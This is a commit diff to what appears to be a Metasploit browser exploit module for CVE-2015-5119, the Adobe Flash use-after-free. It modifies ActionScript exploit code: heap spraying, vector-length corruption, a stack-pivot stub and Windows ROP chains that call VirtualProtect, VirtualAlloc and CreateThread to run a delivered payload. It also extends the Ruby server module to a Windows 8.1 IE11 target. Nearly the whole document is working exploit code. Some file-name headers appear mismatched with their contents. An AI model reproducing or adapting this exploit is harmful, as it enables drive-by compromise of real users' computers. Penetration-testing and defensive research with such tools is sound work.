Update adobe_flash_hacking_team_uaf

Author: jvazquez-r7

data/exploits/CVE-2015-5119/msf.swf

@@ -8,30 +8,29 @@ package
 
 	public class Exploit extends Sprite 
 	{
-		private var b64:Base64Decoder = new Base64Decoder()
+        private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
-        private var os:String
-		
-		public function Exploit():void 
-		{
-			//trace("Got to checkpoint 0");
-			if (stage) init();
-			else addEventListener(Event.ADDED_TO_STAGE, init);
-		}
+
+        public function Exploit():void 
+        {
+            //trace("Got to checkpoint 0");
+            if (stage) init();
+            else addEventListener(Event.ADDED_TO_STAGE, init);
+        }
 
 		private function init(e:Event = null):void 
 		{
 			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            os = LoaderInfo(this.root.loaderInfo).parameters.os
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
             b64.decode(b64_payload)
             payload = b64.toByteArray()
 
 			removeEventListener(Event.ADDED_TO_STAGE, init);
-			MyClass.TryExpl(this, platform, os, payload)
+			Logger.log('TryExpl...')
+			MyClass.TryExpl(this, platform, payload)
 		}
 	}
 }

external/source/exploits/CVE-2015-5119/Exploit.as

@@ -11,27 +11,33 @@ package
         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
-        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
         private var stack_object:uint
         private var payload_space_object:uint
         private var buffer_object:uint
+		private var magic:uint
+		private var magic_arg0:uint
+		private var magic_arg1:uint
+		private var magic_object:uint
+		private var magic_table:uint
         private var buffer:uint
         private var vtable:uint
         private var stack_address:uint
         private var payload_address:uint 
+		private var stub_address:uint
+		private var stub_space_object:uint
+		private var stub:Vector.<uint> = new Vector.<uint>(8) 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
-        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
         {
             exploit = exp
             payload = p
             platform = pl
-            op_system = os
 
             ev = new ExploitVector(uv, uv_length)
             if (!ev.is_ready()) return
@@ -49,16 +55,27 @@ package
             cleanup()
         }
 
+		static function Magic(...a){}
+		
         private function spray_objects():void
         {
             Logger.log("[*] Exploiter - spray_objects()")
+			
+			// mov eax,[esp+0x4]
+			// xchg eax,esp
+			// rets
+			stub[0] = 0x0424448B
+			stub[1] = 0x0000C394
+			
             for (var i:uint = 0; i < spray.length; i++) 
             {
                 spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
                 spray[i][0] = eba.ba
                 spray[i][1] = exploit 
                 spray[i][2] = stack
                 spray[i][3] = payload_space
+				spray[i][4] = Magic
+				spray[i][5] = stub
             } 
         }
 
@@ -76,6 +93,9 @@ package
             main = ev.at(pos + 1) - 1
             stack_object = ev.at(pos + 2) - 1
             payload_space_object = ev.at(pos + 3) - 1
+			magic = ev.at(pos + 4) - 1
+			Logger.log('magic: 0x' + magic.toString(16)) 
+			stub_space_object = ev.at(pos + 5) - 1
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }
@@ -98,6 +118,12 @@ package
             vtable = ev.read(main)
             stack_address = ev.read(stack_object + 0x18)
             payload_address = ev.read(payload_space_object + 0x18)
+			stub_address = ev.read(stub_space_object + 0x18)
+			magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
+			magic_table = ev.read(magic_object)
+			
+			magic_arg0 = ev.read(magic + 0x1c)
+			magic_arg1 = ev.read(magic + 0x20)
         }
 
         private function corrupt_byte_array():void
@@ -138,13 +164,7 @@ package
             if (platform == "linux") {
                 do_rop_linux()
             } else if (platform == "win") {
-                if (op_system == "Windows 8.1") {
-                    do_rop_windows8()
-                } else if (op_system == "Windows 7") {
-                    do_rop_windows()
-                } else {
-                    return
-                }
+                do_rop_windows()
             } else {
                 return
             }
@@ -167,21 +187,20 @@ package
             var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
 
             // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+			eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
 
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            // Put the fake stack on memory
             eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
+            
+			eba.write(0, virtualprotect)
+			
+			// VirtualProtect
             eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
@@ -210,76 +229,27 @@ package
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
-           
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
-        }
-
-        private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows8()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var advapi32:uint = pe.module("advapi32.dll", flash)
-            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
-            var kernel32:uint = pe.module("kernel32.dll", winmm) 
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
-            var createthread:uint = pe.procedure("CreateThread", kernelbase)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
-            
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7ffd0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7ffd0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
-
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7ffd0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
+			
+			for (var i:uint; i < 0x100; i++) {
+				eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
+			}
+			
+			// VirtualProtect the stub with a *reliable* stackpivot
+			eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
+			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+			eba.write(magic + 0x1c, stub_address)
+			eba.write(magic + 0x20, 0x10)
+			var args:Array = new Array(0x41)
+			Magic.call.apply(null, args);
+			
+			// Call to our stackpivot and init the rop chain
+			eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
+			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+			eba.write(magic + 0x1c, stack_address + 0x18000)
+			Magic.call.apply(null, null);
+			eba.write(magic_object, magic_table);
+			eba.write(magic + 0x1c, magic_arg0)
+			eba.write(magic + 0x20, magic_arg1)
         }
 
         private function do_rop_linux():void

external/source/exploits/CVE-2015-5119/Exploiter.as

@@ -12,6 +12,7 @@
 			_gc:Array, 
 			_va:Array,
 			_ba:ByteArray,
+			_corrupted:Vector.<uint>,
 			_isDbg:Boolean = Capabilities.isDebugger;
 
 		// define malicious valueOf()
@@ -34,7 +35,7 @@
 		}
 
 		// try to corrupt the length value of Vector.<uint>
-		static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
+		static function TryExpl(e:Exploit, platform:String, payload:ByteArray) : Boolean
 		{
             Logger.log("tryexpl")
 			try
@@ -55,7 +56,6 @@
 				}
 
 				// find these pages
-				var v:Vector.<uint>;
 				for(i=alen-5; i >= 0; i-=3)
 				{
 					// take next allocated ByteArray
@@ -67,17 +67,22 @@
 					if (_ba[3] != 0) throw new Error("can't cause UaF");
 
 					// check results // find corrupted vector
-					for(var j:int=0; j < _va.length; j++){
-						v = _va[j];
-						if (v.length != 0x3f0) {
-							Logger.log("v.length = 0x" + v.length.toString(16));
-							var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
-							Logger.log("v.length = 0x" + v.length.toString(16));
-							return true
+					for (var j:int = 0; j < _va.length; j++) {	
+						if (_va[j].length != 0x3f0) {
+							_corrupted = _va[j]
+						} else {
+							delete(_va[j])
+							_va[j] = null
 						}
 					}
+					
+					if (_corrupted != null) {
+						Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
+						var exploiter:Exploiter = new Exploiter(e, platform, payload,_corrupted, 0x3f0)
+						Logger.log("_corrupted.length = 0x" + _corrupted.length.toString(16));
+						return true
+					}
 				}
-				
 				Logger.log("bad allocation. try again."); 
 			}
 			catch (e:Error) 

external/source/exploits/CVE-2015-5119/MyClass.as

@@ -21,6 +21,7 @@ def initialize(info={})
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
@@ -68,8 +69,6 @@ def initialize(info={})
           :flash   => lambda do |ver|
             case target.name
             when 'Windows'
-              # Note: Chrome might be vague about the version.
-              # Instead of 18.0.0.203, it just says 18.0
               return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
             when 'Linux'
               return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
@@ -105,12 +104,6 @@ def exploit
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
-    if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
-      print_warning("Target setup not supported")
-      send_not_found(cli)
-      return
-    end
-
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
@@ -125,7 +118,6 @@ def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
-    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
       platform_id = 'win'
@@ -138,9 +130,9 @@ def exploit_template(cli, target_info)
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
     </object>
     </body>
     </html>